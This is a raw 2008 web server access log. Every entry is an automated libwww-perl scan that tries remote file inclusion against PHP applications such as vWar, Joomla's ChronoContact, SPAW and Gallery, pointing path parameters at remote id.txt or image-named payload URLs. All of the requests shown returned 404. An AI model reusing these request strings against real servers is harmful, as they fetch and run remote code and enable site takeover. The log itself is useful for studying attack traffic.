213.35.225.138 - - [06/Jul/2008:20:41:46 -0700] "GET //program/modules/mods_full/shopping_cart/includes/index.php?_SESSION%5Bdocroot_path%5D=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
193.28.86.50 - - [06/Jul/2008:20:42:14 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.28.86.50 - - [06/Jul/2008:20:42:20 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
203.146.170.160 - - [06/Jul/2008:20:42:33 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
213.35.225.138 - - [06/Jul/2008:20:42:42 -0700] "GET //program/modules/mods_full/shopping_cart/includes/index.php?_SESSION%5Bdocroot_path%5D=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
70.87.197.18 - - [06/Jul/2008:20:42:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
213.35.225.138 - - [06/Jul/2008:20:43:14 -0700] "GET //program/modules/mods_full/shopping_cart/includes/index.php?_SESSION%5Bdocroot_path%5D=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
69.13.27.210 - - [06/Jul/2008:20:44:30 -0700] "GET /logs/access_071105.log//init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.202.210 - - [06/Jul/2008:20:44:41 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [06/Jul/2008:20:45:43 -0700] "GET /logs/access_080211.log//include/lib.inc.php?site_path=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
88.158.0.5 - - [06/Jul/2008:20:45:43 -0700] "GET /logs/access_080211.log//include/lib.inc.php?site_path=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
88.158.0.5 - - [06/Jul/2008:20:45:45 -0700] "GET //include/lib.inc.php?site_path=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
88.158.0.5 - - [06/Jul/2008:20:45:45 -0700] "GET //include/lib.inc.php?site_path=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
88.158.0.5 - - [06/Jul/2008:20:45:46 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
88.158.0.5 - - [06/Jul/2008:20:45:46 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
81.208.98.130 - - [06/Jul/2008:20:47:03 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
209.172.55.13 - - [06/Jul/2008:20:47:41 -0700] "GET /logs/access_071105.log//init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
195.56.55.6 - - [06/Jul/2008:20:47:43 -0700] "GET /logs/access_080211.log/admin/editeur/spaw_control.class.php?spaw_root=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.56.55.6 - - [06/Jul/2008:20:47:43 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.56.55.6 - - [06/Jul/2008:20:47:43 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.111.176.88 - - [06/Jul/2008:20:47:49 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"